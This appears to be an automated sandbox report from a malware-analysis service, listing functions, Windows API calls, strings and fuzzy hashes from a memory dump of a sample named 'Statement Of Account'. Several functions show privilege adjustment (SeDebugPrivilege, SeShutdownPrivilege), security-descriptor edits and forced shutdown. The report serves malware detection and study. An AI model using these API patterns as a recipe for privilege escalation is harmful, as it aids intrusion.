%4d%02d%02d%02d%02d%02d, xrefs: 004760F9
%4d, xrefs: 00476144

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d$HH
API String ID: 937276768-3423163872
Opcode ID: 06606d10da03eda39fb356f3a9de7e608b30fcd9bc98489518ee04381959e6a0
Instruction ID: 620d276c2385ea74303efce356e4dd2f8a6156b7ba60b6be50b37e97889d348b
Opcode Fuzzy Hash: 06606d10da03eda39fb356f3a9de7e608b30fcd9bc98489518ee04381959e6a0
Instruction Fuzzy Hash: 7961C8716043006BD314EFA6CC86F6FB3D9AF88B04F404E2FF644662C1E6B9D955876A

Function 00434D50 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 114fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00434D75
__swprintf.LIBCMT ref: 00434D91
_wcslen.LIBCMT ref: 00434D9B
_wcslen.LIBCMT ref: 00434DB0
_wcslen.LIBCMT ref: 00434DC5
CreateDirectoryW.KERNEL32(?,00000000), ref: 00434DD7
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A
_memset.LIBCMT ref: 00434E27
_wcslen.LIBCMT ref: 00434E3C
_wcsncpy.LIBCMT ref: 00434E6F
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9
CloseHandle.KERNEL32(00000000), ref: 00434EB4
RemoveDirectoryW.KERNEL32(?), ref: 00434EBB
CloseHandle.KERNEL32(00000000), ref: 00434ECE

Strings

:, xrefs: 00434DB8
\??\%s, xrefs: 00434D8B
\, xrefs: 00434DA3

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: _wcslen$CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 302090198-3457252023
Opcode ID: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
Instruction ID: 730b2dca1b6b09bd6b76555d3316dee95f4818bcffb97f26f8f03165767cfd2f
Opcode Fuzzy Hash: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
Instruction Fuzzy Hash: 30416676604340ABE330EB64DC49FEF73E8AFD8714F00891EF649921D1E7B4A645876A

Function 00464422 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 193threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00444233: _wcslen.LIBCMT ref: 0044424E

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
GetLastError.KERNEL32 ref: 004644B4
GetCurrentThread.KERNEL32 ref: 004644C8
OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
OpenProcessToken.ADVAPI32(00000000), ref: 004644E7

Strings

SeDebugPrivilege, xrefs: 00464511

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
String ID: SeDebugPrivilege
API String ID: 1312810259-2896544425
Opcode ID: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
Instruction ID: c3f5e6af55eb0da9fa74db60d4f5a84adac3a89a74612fbe59a223ef38337450
Opcode Fuzzy Hash: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
Instruction Fuzzy Hash: 0E51A171200201AFD710DF65DD85F5BB7A8AB84704F10892EFB44DB2C1D7B8E844CBAA

Function 004037E0 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 359COMMON

Download Yara Rule

APIs

Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71

GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403871
GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403887
__wsplitpath.LIBCMT ref: 004038B2

Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2

_wcscpy.LIBCMT ref: 004038C7
_wcscat.LIBCMT ref: 004038DC
SetCurrentDirectoryW.KERNEL32(?), ref: 004038EC

Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734

Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779

Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,0040397D,?,?,00000010), ref: 00403F54
Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,00000010), ref: 00403F8B

_wcscpy.LIBCMT ref: 004039C2
_wcslen.LIBCMT ref: 00403A53
_wcslen.LIBCMT ref: 00403AAA

Strings

Unterminated string, xrefs: 0042B9BA
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0042B87B
_, xrefs: 00403B48
Error opening the file, xrefs: 0042B8AC

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpy$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_wcscatstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
API String ID: 4115725249-188983378
Opcode ID: 03e6ea20781e53ba093b2e4e1cf17e7e885813b4a055a64ca381d3f5bd1a9c3d
Instruction ID: dca64db042171ec5605b2d10b6a92a42a2076cc25022adee7b8115af8a15fc96
Opcode Fuzzy Hash: 03e6ea20781e53ba093b2e4e1cf17e7e885813b4a055a64ca381d3f5bd1a9c3d
Instruction Fuzzy Hash: 16D1D5B15083019AD710EF65C841AEB77E8AF95308F04492FF5C563292DB78DA49C7AB

Function 00469681 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 253windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 004696CC
GetFocus.USER32 ref: 004696E0
GetDlgCtrlID.USER32(00000000), ref: 004696EB
PostMessageW.USER32(?,00000111,?,00000000), ref: 0046973F

Strings

0, xrefs: 00469842

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessagePost$CtrlFocus
String ID: 0
API String ID: 1534620443-4108050209
Opcode ID: a7e7dd4ad94bd17b8779821b2562c3e74f4a4d43059232d4a161c8df91f382bc
Instruction ID: 7d80af5808d25915b866e76daf530f36ef8b085de22dc1c7fc8dbb607ae8adb7
Opcode Fuzzy Hash: a7e7dd4ad94bd17b8779821b2562c3e74f4a4d43059232d4a161c8df91f382bc
Instruction Fuzzy Hash: 1591E1B1604301ABD710DF14D884BABB7A8FB89714F004A1EF99497391E7B4DC49CBAB

Function 0046F2B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 185windowfilenativeCOMMON

Download Yara Rule

APIs

DragQueryPoint.SHELL32(?,?), ref: 0046F2DA

Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F

SendMessageW.USER32(?), ref: 0046F34C
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
_wcscat.LIBCMT ref: 0046F3BC
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
DragFinish.SHELL32(?), ref: 0046F414
NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0046F4FC

Strings

@GUI_DROPID, xrefs: 0046F43A
@GUI_DRAGFILE, xrefs: 0046F4AA
@GUI_DRAGID, xrefs: 0046F46E

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRect$ClientDialogFinishNtdllPointProc_ScreenWindow_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 463080802-3440237614
Opcode ID: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
Instruction ID: d92027b63b9478c52a8b17f069484fb886a707b260a555cedefccfc898d4b85d
Opcode Fuzzy Hash: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
Instruction Fuzzy Hash: 596170716043009BD700EF54D885E5FB7A8FFC9714F104A2EF99097291D7B8A949CBAA

Function 00434BEE Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00434C12
GetFileAttributesW.KERNEL32(?), ref: 00434C4F
SetFileAttributesW.KERNEL32(?,?), ref: 00434C65
FindNextFileW.KERNEL32(00000000,?), ref: 00434C77
FindClose.KERNEL32(00000000), ref: 00434C88
FindClose.KERNEL32(00000000), ref: 00434C9C
FindFirstFileW.KERNEL32(*.*,?), ref: 00434CB7
SetCurrentDirectoryW.KERNEL32(?), ref: 00434CFE
SetCurrentDirectoryW.KERNEL32(0048A090), ref: 00434D22
FindNextFileW.KERNEL32(00000000,00000010), ref: 00434D2A
FindClose.KERNEL32(00000000), ref: 00434D35
FindClose.KERNEL32(00000000), ref: 00434D43

Strings

*.*, xrefs: 00434CB2

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
Instruction ID: 399dbb17912f16e5170155dcc5475d9346bc7ba5aa4a4c8a0ea4d4714b2c7a66
Opcode Fuzzy Hash: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
Instruction Fuzzy Hash: 4141D8726042086BD710EF64DC45AEFB3A8AAC9311F14592FFD54C3280EB79E915C7B9

Function 00442E1F Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 134fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,75918FB0,75918FB0,?,?,00000000), ref: 00442E40
FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 00442EA4
FindClose.KERNEL32(00000000,?,00000000), ref: 00442EB5
FindClose.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00442ED1
FindFirstFileW.KERNEL32(*.*,?), ref: 00442EF0
SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00442F3B
SetCurrentDirectoryW.KERNEL32(0048A090,?,?,?,00000000), ref: 00442F6D
FindNextFileW.KERNEL32(00000000,00000010), ref: 00442F75
FindClose.KERNEL32(00000000), ref: 00442F80

Part of subcall function 00436D2D: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,75923220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F

FindClose.KERNEL32(00000000,?,?,?,00000000), ref: 00442F92

Strings

*.*, xrefs: 00442EEB

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
Instruction ID: 5fd3b3f399b1dfd6b0a62b5043663bf11a2259675d3c80dc16c90576bc2ddb84
Opcode Fuzzy Hash: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
Instruction Fuzzy Hash: 0F41E8326083046BD620FA64DD85BEFB3A89BC5311F54492FF95483280E7FEA50D8779

Function 00444078 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 94timesleepCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00444082
timeGetTime.WINMM ref: 0044409D
Sleep.KERNEL32(0000000A), ref: 00444183

Strings

BUTTON, xrefs: 004440D8

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Timetime$Sleep
String ID: BUTTON
API String ID: 4176159691-3405671355
Opcode ID: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
Instruction ID: 32c89cc89acb3c111fc3cc5f781edb0c57d51ec263d79eeef99f8852f1a29925
Opcode Fuzzy Hash: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
Instruction Fuzzy Hash: CB21B7723843016BE330DB74FD4DF5A7B94A7A5B51F244876F600E6290D7A5D442876C

Function 00445DD3 Relevance: 18.2, APIs: 12, Instructions: 179COMMON

Download Yara Rule

APIs

Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B

Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5

GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00445E4B
_memset.LIBCMT ref: 00445E61
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445E83
GetLengthSid.ADVAPI32(?), ref: 00445E92
GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 00445EDE
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00445EFB
GetLengthSid.ADVAPI32(?,?,00000018), ref: 00445F11
GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00445F39
CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00445F40
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 00445F6E
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00445F8B
SetUserObjectSecurity.USER32(?,?,?), ref: 00445FA0

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3490752873-0
Opcode ID: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
Instruction ID: 491154c1e478dcf6c9ac3cbca3c2c9e2645d4ee7bbdc2abf5fae4ada557f6fe4
Opcode Fuzzy Hash: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
Instruction Fuzzy Hash: 85519D71108301ABD610DF61CD84E6FB7E9AFC9B04F04491EFA869B242D778E909C76B

Function 0047A999 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 288comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0047AA03
CLSIDFromProgID.COMBASE(00000000,?), ref: 0047AA27
CoCreateInstance.COMBASE(?,00000000,00000005,004829C0,?), ref: 0047AAAA
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
_memset.LIBCMT ref: 0047AB7C
_wcslen.LIBCMT ref: 0047AC68
_memset.LIBCMT ref: 0047ACCD
CoCreateInstanceEx.COMBASE ref: 0047AD06
CoSetProxyBlanket.COMBASE(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53

Strings

NULL Pointer assignment, xrefs: 0047AD84

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CreateInitializeInstance_memset$BlanketFromProgProxySecurity_wcslen
String ID: NULL Pointer assignment
API String ID: 1588287285-2785691316
Opcode ID: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
Instruction ID: 16786b45dbc5194aa398acfc0f0ff3b91b98a178c64a073a91da7f4e0cb75f58
Opcode Fuzzy Hash: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
Instruction Fuzzy Hash: 54B10DB15083409FD320EF65C881B9FB7E8BBC8744F108E2EF58997291D7759948CB66

Function 004364AA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 79shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
GetLastError.KERNEL32 ref: 00436504
ExitWindowsEx.USER32(?,00000000), ref: 00436527
InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0043656A

Strings

SeShutdownPrivilege, xrefs: 004364CF

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
String ID: SeShutdownPrivilege
API String ID: 2938487562-3733053543
Opcode ID: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
Instruction ID: b625d7910520021a286729d09db348b3c4b0b131b75d5259d4bd29649b467962
Opcode Fuzzy Hash: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
Instruction Fuzzy Hash: E021D5B02803017FF7149B64DD4AF6B3398EB48B10F948829FE09852D2D6BDE844973D

